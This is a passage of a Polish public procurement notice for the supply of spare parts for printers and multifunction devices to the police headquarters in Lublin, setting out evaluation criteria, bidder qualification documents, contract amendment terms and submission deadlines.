<br/><br/>W przypadku <br/>- gdy Wykonawca nie wskaże terminu realizacji zamówienia cząstkowego (nie zaznaczy) lub kiedy zaznaczy dwa lub trzy możliwe warianty – Zamawiający przyjmie do oceny oferty maksymalny termin realizacji zamówienia cząstkowego, wynoszący 9 dni roboczych, uznając jednocześnie oświadczenie wykonawcy złożone w pkt 4 załącznika nr 1 do SWZ – druk „Oferta”, że zaoferowany przedmiot zamówienia spełnia minimalne wymogi Zamawiającego. <br/>Wykonawca otrzyma odpowiednio 0 pkt w tym kryterium.<br/><br/>Szczegółowy opis kryteriów oceny ofert zawarty jest w rozdziale XX SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia cząstkowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa części zamiennych do drukarek na potrzeby KWP w Lublinie i jednostek podległych.<br/>2.	Szczegółowy opis i zakres przedmiotu zamówienia został określony w Formularzu cenowym - załącznik nr 1.3 (będący jednocześnie specyfikacją techniczną) oraz we wzorze umowy - załącznik nr 4, stanowiących załączniki do Specyfikacji Warunków Zamówienia (SWZ). <br/>3.	Zaoferowany przez wykonawcę asortyment musi spełniać wszystkie wymagania określone przez Zamawiającego w dokumentach zamówienia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 90681,30 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30124000-4 - Części i akcesoria do maszyn biurowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami:<br/><br/>Dla pakietów nr 2, 3 i 4 <br/>1)	cena oferty brutto (C) - 60% (odpowiada 60 pkt)<br/>2)	termin realizacji zamówienia cząstkowego (T) – 40% (odpowiada 40 pkt)<br/><br/>ad 1) 60% – cena oferty brutto (C)<br/>Dla kryterium – cena oferty brutto, ilość punktów będzie obliczona wg wzoru:<br/><br/> Najniższa cena ofertowa z przedłożonych ofert	<br/>	C=------------------------------------------------------	x60<br/> Cena oferty badanej	<br/><br/>Przy ocenie tego kryterium Zamawiający będzie brał pod uwagę cenę brutto podaną <br/>w załączniku nr 1 do SWZ (druk „Oferta”). <br/><br/>ad 2) termin realizacji zamówienia cząstkowego (T) – 40%<br/><br/>Dla kryterium – termin realizacji zamówienia cząstkowego, ilość punktów będzie obliczona zgodnie <br/>z poniższymi zasadami:<br/><br/>- termin realizacji zamówienia cząstkowego – do 5 dni roboczych – 40 pkt<br/>- termin realizacji zamówienia cząstkowego – do 7 dni roboczych – 20 pkt<br/>- termin realizacji zamówienia cząstkowego – do 9 dni roboczych – 0 pkt<br/><br/>Przy ocenie tego kryterium Zamawiający będzie brał pod uwagę „termin realizacji zamówienia cząstkowego” na podstawie zaznaczonego jednego z trzech powyższych wariantów w wyznaczonym miejscu w załączniku nr 1 do SWZ dotyczącym przedmiotowego kryterium (uzyskać można odpowiednio 40, 20 lub 0 punktów). <br/>Wykonawca powinien zaznaczyć (np.: poprzez postawienie krzyżyka 1) oferowany termin realizacji zamówienia cząstkowego (można zaznaczyć tylko jeden).<br/>Przez dni robocze Zamawiający rozumie od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy. Jeżeli koniec terminu do wykonania czynności przypada na dzień ustawowo wolny od pracy, termin upływa dnia następnego po dniu lub dniach wolnych od pracy.<br/>Zaoferowany przez Wykonawcę termin realizacji zamówienia cząstkowego zostanie wpisany do umowy (§ 4 ust. 1 wzoru umowy). <br/><br/>W przypadku <br/>- gdy Wykonawca nie wskaże terminu realizacji zamówienia cząstkowego (nie zaznaczy) lub kiedy zaznaczy dwa lub trzy możliwe warianty – Zamawiający przyjmie do oceny oferty maksymalny termin realizacji zamówienia cząstkowego, wynoszący 9 dni roboczych, uznając jednocześnie oświadczenie wykonawcy złożone w pkt 4 załącznika nr 1 do SWZ – druk „Oferta”, że zaoferowany przedmiot zamówienia spełnia minimalne wymogi Zamawiającego. <br/>Wykonawca otrzyma odpowiednio 0 pkt w tym kryterium.<br/><br/>Szczegółowy opis kryteriów oceny ofert zawarty jest w rozdziale XX SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia cząstkowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa części zamiennych do urządzeń wielofunkcyjnych na potrzeby KWP w Lublinie i jednostek podległych.<br/>2.	Szczegółowy opis i zakres przedmiotu zamówienia został określony w Formularzu cenowym - załącznik nr 1.4 (będący jednocześnie specyfikacją techniczną) oraz we wzorze umowy - załącznik nr 4, stanowiących załączniki do Specyfikacji Warunków Zamówienia (SWZ). <br/>3.	Zaoferowany przez wykonawcę asortyment musi spełniać wszystkie wymagania określone przez Zamawiającego w dokumentach zamówienia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 4146,34 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30124000-4 - Części i akcesoria do maszyn biurowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami:<br/><br/>Dla pakietów nr 2, 3 i 4 <br/>1)	cena oferty brutto (C) - 60% (odpowiada 60 pkt)<br/>2)	termin realizacji zamówienia cząstkowego (T) – 40% (odpowiada 40 pkt)<br/><br/>ad 1) 60% – cena oferty brutto (C)<br/>Dla kryterium – cena oferty brutto, ilość punktów będzie obliczona wg wzoru:<br/><br/> Najniższa cena ofertowa z przedłożonych ofert	<br/>	C=------------------------------------------------------	x60<br/> Cena oferty badanej	<br/><br/>Przy ocenie tego kryterium Zamawiający będzie brał pod uwagę cenę brutto podaną <br/>w załączniku nr 1 do SWZ (druk „Oferta”). <br/><br/>ad 2) termin realizacji zamówienia cząstkowego (T) – 40%<br/><br/>Dla kryterium – termin realizacji zamówienia cząstkowego, ilość punktów będzie obliczona zgodnie <br/>z poniższymi zasadami:<br/><br/>- termin realizacji zamówienia cząstkowego – do 5 dni roboczych – 40 pkt<br/>- termin realizacji zamówienia cząstkowego – do 7 dni roboczych – 20 pkt<br/>- termin realizacji zamówienia cząstkowego – do 9 dni roboczych – 0 pkt<br/><br/>Przy ocenie tego kryterium Zamawiający będzie brał pod uwagę „termin realizacji zamówienia cząstkowego” na podstawie zaznaczonego jednego z trzech powyższych wariantów w wyznaczonym miejscu w załączniku nr 1 do SWZ dotyczącym przedmiotowego kryterium (uzyskać można odpowiednio 40, 20 lub 0 punktów). <br/>Wykonawca powinien zaznaczyć (np.: poprzez postawienie krzyżyka 1) oferowany termin realizacji zamówienia cząstkowego (można zaznaczyć tylko jeden).<br/>Przez dni robocze Zamawiający rozumie od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy. Jeżeli koniec terminu do wykonania czynności przypada na dzień ustawowo wolny od pracy, termin upływa dnia następnego po dniu lub dniach wolnych od pracy.<br/>Zaoferowany przez Wykonawcę termin realizacji zamówienia cząstkowego zostanie wpisany do umowy (§ 4 ust. 1 wzoru umowy). <br/><br/>W przypadku <br/>- gdy Wykonawca nie wskaże terminu realizacji zamówienia cząstkowego (nie zaznaczy) lub kiedy zaznaczy dwa lub trzy możliwe warianty – Zamawiający przyjmie do oceny oferty maksymalny termin realizacji zamówienia cząstkowego, wynoszący 9 dni roboczych, uznając jednocześnie oświadczenie wykonawcy złożone w pkt 4 załącznika nr 1 do SWZ – druk „Oferta”, że zaoferowany przedmiot zamówienia spełnia minimalne wymogi Zamawiającego. <br/>Wykonawca otrzyma odpowiednio 0 pkt w tym kryterium.<br/><br/>Szczegółowy opis kryteriów oceny ofert zawarty jest w rozdziale XX SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia cząstkowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu w okolicznościach określonych w rozdziale VII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie określa szczegółowych warunków w tym zakresie<br/>4)	zdolności technicznej lub zawodowej<br/>Zamawiający nie określa szczegółowych warunków w tym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenia i dokumenty składane przez Wykonawców wraz z ofertą:<br/>1)	oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym przez Zamawiającego. Wzór oświadczenia stanowi załącznik nr 2 do SWZ.<br/><br/>2.	Oświadczenia i dokumenty, składane przez wykonawcę na wezwanie Zamawiającego, na potwierdzenie braku podstaw do wykluczenia z udziału w postępowaniu:<br/>1)	oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy (złożonym wraz z ofertą zgodnie z pkt 1). Wzór oświadczenia stanowi załącznik nr 3 do SWZ.<br/>2)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania oraz na potwierdzenie braku podstaw do wykluczenia <br/>w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp.<br/>a)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>b)	W przypadku Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, przedmiotowy dokument należy złożyć także <br/>w odniesieniu do tych podmiotów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Oświadczenia i dokumenty składane przez Wykonawców wraz z ofertą:<br/>1)	oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym przez Zamawiającego. Wzór oświadczenia stanowi załącznik nr 2 do SWZ.<br/>2.	Oświadczenia lub dokumenty, składane przez wykonawcę na wezwanie Zamawiającego, na potwierdzenie spełniania warunków udziału w postępowaniu:<br/>Zamawiający nie określił szczegółowych warunków udziału w postępowaniu, stąd nie wymaga złożenia dokumentów w powyższym zakresie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający żąda złożenia wraz z ofertą niżej wymienionych przedmiotowych środków dowodowych na potwierdzenie, że oferowane dostawy spełniają określone przez Zamawiającego wymagania, cechy lub kryteria:<br/>1)	Dokument będący wydrukiem ze strony: http://www.cpubenchmark.net/cpu_list.php - potwierdzający, że oferowany procesor osiągnął w teście wydajności Passmark CPU Mark min. 8000 pkt.<br/>WW. dokument jest wymagany wyłącznie w pakiecie nr 1 – Akcesoria komputerowe i dotyczy pozycji nr 25 załącznika nr 1.1 do SWZ.<br/><br/>UWAGA: Wszystkie składane przez wykonawcę dokumenty muszą być złożone w języku polskim. Dokumenty sporządzone w języku obcym muszą być przekazane wraz z tłumaczeniem na język polski<br/>2.	Zamawiający akceptuje równoważne przedmiotowe środki dowodowe, jeśli potwierdzają, że oferowane dostawy, usługi lub roboty budowlane spełniają określone przez Zamawiającego wymagania, cechy lub kryteria.<br/>3.	Zgodnie z art. 107 ust. 2 ustawy, jeżeli wykonawca nie złożył przedmiotowych środków dowodowych, o których mowa w pkt 1 ppkt 1) lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wydruk ze strony: http://www.cpubenchmark.net/cpu_list.php - potwierdzający, że oferowany procesor osiągnął w teście wydajności Passmark CPU Mark min. 8000 pkt.<br/>WW. dokument jest wymagany wyłącznie w pakiecie nr 1 – Akcesoria komputerowe i dotyczy pozycji nr 25 załącznika nr 1.1 do SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Druk Oferta- załącznik nr 1 do SWZ.<br/>2)	Formularze cenowe, stanowiące załączniki nr 1.1. – 1.4 do SWZ (w zależności od wybranego/-ych pakietu/-ów).<br/><br/>Uwaga: Druk Oferta (należy złożyć wszystkie 3 strony) oraz Formularze cenowe są dokumentami, które nie będą podlegały uzupełnieniu. <br/>Jeżeli wykonawca nie złoży druku Oferta oraz Formularza/-y cenowego/-ych <br/>(w zależności od wybranego/-ych przez Wykonawcę pakietu/-ów), jego oferta będzie podlegała odrzuceniu.<br/><br/>3)	Oświadczenie składane na podstawie art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, zgodnie z zasadami określonymi w rozdziale VI i VII SWZ. Wzór oświadczenia stanowi załączniku nr 2 do SWZ.<br/>4)	Przedmiotowe środki dowodowe:<br/>- Wydruk ze strony: : http://www.cpubenchmark.net/cpu_list.php - potwierdzający, że oferowany procesor osiągnął w teście wydajności Passmark CPU Mark min. 8000 pkt – dotyczy Pakietu nr 1 - Akcesoria komputerowe (poz. nr 25 załącznika 1.1 do SWZ).<br/>5)	Pełnomocnictwo (jeżeli dotyczy).<br/>6)	Zobowiązanie podmiotu udostępniającego zasoby, w sytuacji jeżeli Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	Pełnomocnictwo winno być załączone do oferty. Pełnomocnictwo do złożenia oferty winno być złożone w oryginale w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 §2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>3.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. <br/>4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5.	W przypadku, o którym mowa w pkt 3 i 4, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do ofert oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (oświadczenie, o którym mowa w art. 117 ust. 4 ustawy). <br/>6.	Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 ustawy (powyższy pkt 5) dotyczy również Wykonawców, prowadzących działalność w formie spółki cywilnej. Na gruncie przepisów dotyczących zamówień publicznych przedsiębiorców, prowadzących działalność w formie spółki cywilnej należy traktować jak wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>Zgodnie z art. 117 ust. 4 ustawy, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, w okolicznościach gdy Zamawiający określa warunki udziału w postępowaniu dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o których mowa w art. 112 ust. 2 pkt 2 ustawy lub warunki dotyczące wykształcenia, kwalifikacji zawodowych lub doświadczenia, zobowiązani są do dołączenia do oferty oświadczenia, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <br/>7.	Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy stanowi załącznik nr 4 do SWZ – wzór umowy.<br/>2.	We wzorze umowy Zamawiający przewidział wszystkie istotne dla stron postanowienia oraz przyszłe zobowiązania wykonawcy i Zamawiającego.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 455 ustawy, w szczególności w następującym zakresie:<br/>&#34;§ 1:<br/>4.	Strony przewidują możliwość przedłużenia terminu obowiązywania umowy maksymalnie o kolejnych 6 miesięcy, w przypadku gdy w terminie określonym w ust. 3 nie zostanie w pełni wykorzystana kwota umowy, o której mowa w § 2 ust. 1 niniejszej umowy.<br/>5.	Zamawiający zastrzega sobie prawo do odstąpienia od umowy, w przypadku gdy Wykonawca w sposób zawiniony i rażący naruszy, chociażby jeden raz postanowienia warunków niniejszej umowy <br/>i nie usunie tego naruszenia pomimo wcześniejszego wezwania w terminie w nim wyznaczonym, nie krótszym niż 5 dni roboczych, z uwzględnieniem § 5 ust. 1 lit. a) niniejszej umowy. Umowne prawo odstąpienia Zamawiający zrealizuje w formie pisemnej, z podaniem uzasadnienia w terminie 30 dni od dnia powzięcia informacji o okoliczności stanowiącej podstawę odstąpienia od umowy.&#34;<br/>§ 2:<br/>&#34;7. Zamawiający przewiduje możliwość dokonania zmian postanowień niniejszej umowy w następujących przypadkach:<br/>a) konieczność dostarczenia innego, niż określonego w Umowie asortymentu wskazanego w załączniku do umowy, niepowodującego zwiększenia ceny, spowodowaną możliwością zastosowania nowszych i korzystniejszych dla Zamawiającego rozwiązań technologicznych lub technicznych, niż te istniejące w chwili podpisania umowy lub zakończeniem produkcji określonego w umowie asortymentu lub wycofaniem go z produkcji lub obrotu na terytorium Rzeczypospolitej Polskiej, posiadającego parametry nie gorsze od zaproponowanych przez Wykonawcę w ofercie;<br/>b) pojawienie się na rynku asortymentu nowszej generacji, o lepszych parametrach technicznych i technologicznych pod warunkiem, że takie zmiany nie spowodują zwiększenia ceny;<br/>c) Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy Wykonawca: <br/>- w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy.<br/>8. Zmiana postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu, pod rygorem nieważności.<br/>9. Zmiana wysokości podatku akcyzowego nie będzie miała wpływu na koszt realizacji przedmiotu umowy przez Wykonawcę.(...)<br/>14. Wynagrodzenie Wykonawcy może ulegać zmianom (podwyższeniu lub obniżeniu), w zakresie zamówienia pozostałego do wykonania, w wypadku zaistnienia po dniu podpisania umowy zmiany kosztów związanych z realizacją zamówienia, przy czym warunkiem powstania uprawnienia do żądania zmiany wynagrodzenia jest zmiana kosztów na poziomie co najmniej 10% w stosunku do kosztów przyjętych w ofercie Wykonawcy.<br/>15. Wprowadzenie zmian wysokości wynagrodzenia Wykonawcy w wyniku zmiany kosztów związanych z realizacją zamówienia wymaga uprzednio złożenia przez stronę pisemnego wniosku o dokonanie zmiany i informacji o wysokości wzrostu lub obniżenia kosztów wynikających z wprowadzenia zmian. W informacji zostaną zawarte następujące dane: wskazanie wartości poszczególnych kosztów przyjętych przy kalkulowaniu ceny ofertowej (cen jednostkowych), wartość zmiany kosztów związanych z realizacją zamówienia w stosunku do cen przyjętych w ofercie, kwotowe i ilościowe wskazanie dotychczasowego zużycia w/w materiałów i pozostałych elementów decydujących o w/w kosztach związanych z realizacją przedmiotu zamówienia, wartość o jaką w wyniku przedmiotowych zmian wzrasta lub ulega obniżeniu wynagrodzenie ...(...). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-31 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-31 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Środki ochrony prawnej wnosi się zgodnie z zapisami zawartymi w dziale IX Środki ochrony prawnej ustawy z 11 września<br/>2019 r. Prawo zamówień publicznych (Dz. U. z 2022 poz. 1710 z późn. zm.).<br/>2. Zamawiający przewiduje dodatkowe obligatoryjne przesłanki wykluczenia wykonawcy:<br/>- Zgodnie z art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022., poz. 835 z późn. zm.), w celu przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022 r., wobec osób i podmiotów wpisanych na listę, o której mowa w art. 2 ustawy, stosuje się sankcje polegające m.in. na wykluczeniu z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 z późn. zm.), zwanej dalej „ustawą Pzp”.<br/>Na podstawie art. 7 ust. 1 ww. ustawy z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2)	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w 